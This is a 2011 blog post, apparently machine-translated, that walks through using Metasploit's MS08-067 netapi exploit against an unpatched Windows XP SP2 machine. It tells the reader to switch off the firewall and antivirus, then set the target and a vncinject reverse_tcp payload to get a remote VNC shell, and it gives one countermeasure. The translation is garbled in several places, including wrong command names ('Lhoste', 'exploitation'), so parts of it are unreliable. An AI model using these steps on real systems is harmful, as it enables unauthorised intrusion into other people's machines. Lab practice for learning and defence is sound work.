Related Posts Plugin for WordPress, Blogger...

Attacking with Metasploit Windows XP SP2

Posted by VdoCity Monday, September 19, 2011

the previous post regarding metasploit "Using Metasploit With an inner Keylogger Meterpreter?" explained an easy to use keylogger meterpreter in order to get the keystrokes to the victims, however, after writing this article I received some comments that I have disappointed a lot, readers were asking questions like "What is Metasploit", "What is Meterpreter", so I decided not to jump on the advanced topics cover the basics before.


This article shows how to use a Ms08_067_Netapi exploit unpatched Windows XP to access the machine. The original name of the farm is "Microsoft Service server relative path stack corruption", it explodes NX helps to pass on various operating systems and service packs, before jumping into the process of exploitation, I suggest to take some time to the operation code here.

Requirements
1. Bactrack 5
2. Windows XP SP2 operating system

We will perform this attack on a Windows XP operating system without upgrading, I recommend you try it in a safe environment, use of these methods in a public environment is definitely a crime.

Configuring Windows XP SP2

Before attacking the Windows XP operating system, we would like to ensure that it is vulnerable to attack so before gently change the following things:

1. Disable the firewall completely.
2. Off Antivrus if any.
3. Turn off "Automatic Updates"


Attacking a Windows XP host with Metasploit
So here is how we will cut into the Windows XP machine using the Metasploit Framework, if you are unfamiliar with basic concepts Metasploit, consider reading the post - explained for beginners Metasploit Framework.

Step 1 - First start the Backtrack 5 virtual machine.

Step 2 - Then in console type "msfconsole" This will load the Metasploit Framework.

Step 3 - Now type the command "show exploits" this will load all current exploits in metasploit.


Step 4 - the next issue of the "search NetAPI" command in the console, the search command for all the modules to operate with the pattern "Api"


Step 4 - Next type "use windows/smb/ms08_067_netapi" in the console.

Step 5 - Now, after the deed has been the installation, which should enter the rhost, rhost refers to the IP address of the victim. You can get the Windows IP host by issuing the command "ipconfig" at the command prompt.

Step 6 - Once the exploit is configured, it is time to install a load in this case we will use an edition of Windows / shell / vncinject payloads, cargo capacity isuing whole load windows / vncinject / reverse_tcp command in the shell, then have to set the proper Lhoste with the command "Lhoste ".


Step 7 - Next issue the command "show options" to check if everything is configured well.

Step 8 - Once you have completed your evaluation, just type "exploitation" in the console, if you followed the steps correctly you will have a shell open on your computer vnc victims.



If you have any questions, feel free to ask.

Countermeasures

1. Make sure your firewall is activated.

0 comments

Post a Comment